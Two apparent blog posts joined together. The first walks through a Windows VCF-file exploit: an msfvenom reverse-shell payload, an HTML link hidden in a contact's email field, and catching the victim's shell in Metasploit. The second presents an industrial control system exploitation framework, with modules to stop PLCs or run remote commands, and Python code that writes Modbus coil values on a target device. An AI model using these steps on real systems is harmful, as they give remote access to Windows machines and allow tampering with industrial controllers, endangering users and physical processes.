Exploiting Windows using malicious VCF file

John Page a cyber security researcher brought this vulnerability, which was a 0 day exploit working on latest windows 10 too.

Introduction: He discovered that if we replace the website in a VCF file with the local path of a ".cpl" file, it tends to install that file instead of opening it on browser. This is done by replacing "http://" with "http.\\" or we can also inject some html in email field to do same and when user clicks on it we get a shell. (This exploit uses human interaction)

Proof Of Concept:


1.   We need to create a simple payload. ( I used msfvenom and selected format as ".vbs")

       msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<lport> -f vbs > <file_name>.vbs

2.   Inject html with href value to payload file name inside email field (Both files present in same folder). And save the file

      <a href="shell.vbs">alokkumar@gmail.com</a>

3.   Now we have to send this folder to the victim.

4.   Set up multi/handler with proper options in metasploit and wait for victim to click on link

5.   When user clicks on link we get a shell.

This exploit needs user interaction although its a 0 day. Post your comments below, Thanks for reading.

Industrial Control System Exploitation Framework

Introduction

ISF(Industrial Exploitation Framework) : It is a exploitation framework written in python and based on open source project routersploit. It helps us to test vulnerabilities with multiple programmable logic controller (PLC) and Industrial Control System (ICS) software.

Link :- https://github.com/dark-lbp/isf

Modbus : Modbus is a serial communication protocol. Which is used to connecting industrial electronic devices because they are free and easy to deploy. It has one Master and one (at least) or more Slaves. Each slave has unique 8-bit device address or unit number.

Coils and registers are names or pre-defined variables for memory addresses. The coil is a boolean (bit) variable and a register is an integer variable. There are discrete inputs (read-only boolean), coils (read-write boolean), input registers (read-only integer), and holding registers (read-write integer).

Requirements

* gnureadline

* requests

* paramiko

* beautifulsoup4

* pysnmp

* python-nmap

* scapy

Exploit modules included in ICSSPLOIT

* s7_300_400_plc_control.py: Siemens S7-300 and S7-400 start/stop

* vxworks_rpc_dos.py: Works on all Vxworks system which Remote Procedure

    call (RPC) protocols is enabled.（CVE-2015-7599)

* quantum_140_plc_control.py: Schneider Quantum 140 series start/stop.

* crash_qnx_inetd_tcp_service.py: Crash QNX Inetd tcp service started with inetd.

* qconn_remote_exec.py: QCONN QNX Neutrino remote command execution

    vulnerability.

Installation

There is requirements file which can be installed by using pip as:

pip install -r requirements

PoC

--> Setup Modbus master and one slave on other machine in network.

--> Import module

Move to downloaded directory isf and type python

 
from icssploit.clients.modbus_tcp_client import ModbusClient

 

--> Init Client

target = ModbusClient(name=’modbus_tcp_client’, ip=’<IP>’)

 

eg: target = ModbusClient(name=’modbus_tcp_client’, ip=’192.168.0.115’)

target.connect()

We are now connected to Modbus Client.

 


--> Read Coils

 

target.read_coils(address=<Address Of Slave>, count=<Count Of Coils>)

 

eg: target.read_coils(address=100, count=10)

 

This is used to read the values of coil at specified slave address.

--> Write Coils

 

target.write_multiple_coils(address=<Address Of Slave>, values=[<Values To

Be Written>])

 

eg: target.write_multiple_coils(address=100, values=[1, 1, 1, 1, 1, 1, 1, 1])

 

We can also change or write the values of coils here.

Now we can read coils again to confirm the changes made.